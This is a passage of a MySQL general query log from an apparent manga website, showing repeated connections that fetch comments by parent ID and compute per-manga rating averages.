on u317079482_mangaberri_1 using Socket 330650570 Query select * FROM comments where parent_id = '38' 330650570 Quit 330650571 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650571 Query select * FROM comments where parent_id = '39' 330650571 Quit 330650572 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650572 Query select * FROM comments where parent_id = '40' 330650572 Quit 330650573 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650573 Query select * FROM comments where parent_id = '41' 330650573 Quit 330650574 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650574 Query select * FROM comments where parent_id = '37' 330650574 Quit 330650575 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650575 Query select * FROM comments where parent_id = '36' 330650575 Quit 330650576 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650576 Query select * FROM comments where parent_id = '35' 330650576 Quit 330650577 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650577 Query select * FROM comments where parent_id = '30' 330650577 Quit 330650578 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650578 Query select * FROM comments where parent_id = '29' 330650578 Quit 330650579 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650579 Query select * FROM comments where parent_id = '28' 330650579 Quit 330650580 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650580 Query select * FROM comments where parent_id = '27' 330650580 Quit 330650581 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650581 Query select * FROM comments where parent_id = '26' 330650581 Quit 330650582 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650582 Query select * FROM comments where parent_id = '24' 330650582 Quit 330650583 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650583 Query select * FROM comments where parent_id = '20' 330650583 Quit 330650584 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650584 Query select * FROM comments where parent_id = '19' 330650584 Quit 330650585 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650585 Query select * FROM comments where parent_id = '17' 330650585 Quit 330650586 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650586 Query select * FROM comments where parent_id = '5' 330650586 Quit 330650587 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650587 Query select * FROM comments where parent_id = '4' 330650587 Quit 330650588 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650588 Query select * FROM comments where parent_id = '1' 330650588 Quit 330650589 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330650589 Quit 330650590 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330650590 Quit 330650591 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330650591 Quit 330650592 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330650592 Quit 330650593 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330650593 Quit 330650594 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330650594 Quit 330650595 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330650595 Quit 330650596 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330650596 Quit 330650597 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330650597 Quit 330650598 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330650598 Quit 330650599 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330650599 Quit 330650600 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330650600 Quit 330650601 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330650601 Quit 330650602 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330650602 Quit 330650603 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330650603 Quit 330650604 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330650604 Quit 330650605 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330650605 Quit 330650606 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330650606 Quit 330650607 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330650607 Quit 330650608 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330650608 Quit 330650609 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330650609 Quit 330650610 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330650610 Quit 330650611 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330650611 Quit 330650612 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330650612 Quit 330650613 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330650613 Quit 330650614 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330650614 Quit 330650615 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330650615 Quit 330650616 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330650616 Quit 330650617 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330650617 Quit 330650618 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330650618 Quit 330650619 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330650619 Quit 330650620 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330650620 Quit 330650621 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330650621 Quit 330650622 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330650622 Quit 330650623 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330650623 Quit 330650624 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330650624 Quit 330650625 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330650625 Quit 330650626 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330650626 Quit 330650627 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330650627 Quit 330650628 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330650628 Quit 330650629 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330650629 Quit 330650630 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330650630 Quit 330650631 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330650631 Quit 330650632 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330650632 Quit 330650633 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330650633 Quit 330650634 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330650634 Quit 330650635 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330650635 Quit 330650636 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330650636 Quit 330650637 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330650637 Quit 330650638 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330650638 Quit 330650639 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330650639 Quit 330650640 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330650640 Quit 330650641 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330650641 Quit 330650642 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330650642 Quit 330650643 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330650643 Quit 330650644 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330650644 Quit 330650645 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330650645 Quit 330650646 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330650646 Quit 330650647 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330650647 Quit 330650648 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330650648 Quit 330650649 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330650649 Quit 330650650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330650650 Quit 330650651 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330650651 Quit 330650652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330650652 Quit 330650653 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330650653 Quit 330650654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330650654 Quit 330650655 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330650656 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650655 Quit 330650656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330650656 Quit 330650657 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330650657 Quit 330650658 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330650658 Quit 330650659 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330650659 Quit 330650660 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330650660 Quit 330650661 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330650661 Quit 330650662 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330650662 Quit 330650663 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330650663 Quit 330650664 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330650664 Quit 330650665 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330650665 Quit 330650666 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330650666 Quit 330650667 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330650667 Quit 330650668 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330650668 Quit 330650669 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330650669 Quit 330650670 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330650670 Quit 330650671 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330650671 Quit 330650672 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330650672 Quit 330650673 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330650673 Quit 330650674 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330650674 Quit 330650675 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330650675 Quit 330650676 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330650676 Quit 330650677 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330650677 Quit 330650678 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330650678 Quit 330650679 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330650679 Quit 330650680 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330650680 Quit 330650681 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330650681 Quit 330650682 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330650682 Quit 330650683 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330650683 Quit 330650684 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330650684 Quit 330650685 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330650685 Quit 330650686 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330650686 Quit 330650687 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330650687 Quit 330650688 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330650688 Quit 330650689 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330650689 Quit 330650690 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330650690 Quit 330650691 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330650691 Quit 330650692 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330650692 Quit 330650693 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330650693 Quit 330650694 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330650694 Quit 330650695 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330650695 Quit 330650696 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330650696 Quit 330650697 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330650697 Quit 330650698 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330650698 Quit 330650699 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330650699 Quit 330650700 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330650700 Quit 330650701 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330650701 Quit 330650702 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330650702 Quit 330650703 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330650703 Quit 330650704 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330650704 Quit 330650705 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330650705 Quit 330650706 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330650706 Quit 330650707 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330650707 Quit 330650708 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330650708 Quit 330650709 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330650709 Quit 330650710 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330650710 Quit 330650711 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330650711 Quit 330650712 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330650712 Quit 330650713 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330650713 Quit 330650714 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330650714 Quit 330650715 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330650715 Quit 330650716 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330650716 Quit 330650717 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330650717 Quit 330650718 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330650718 Quit 330650719 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330650719 Quit 330650720 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330650720 Quit 330650721 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330650721 Quit 330650722 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330650722 Quit 330650723 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330650723 Quit 330650724 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330650724 Quit 330650725 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330650725 Quit 330650726 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330650726 Quit 330650727 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330650727 Quit 330650728 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330650728 Quit 330650729 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330650729 Query select count(id) as total_rating, (sum(rating) / 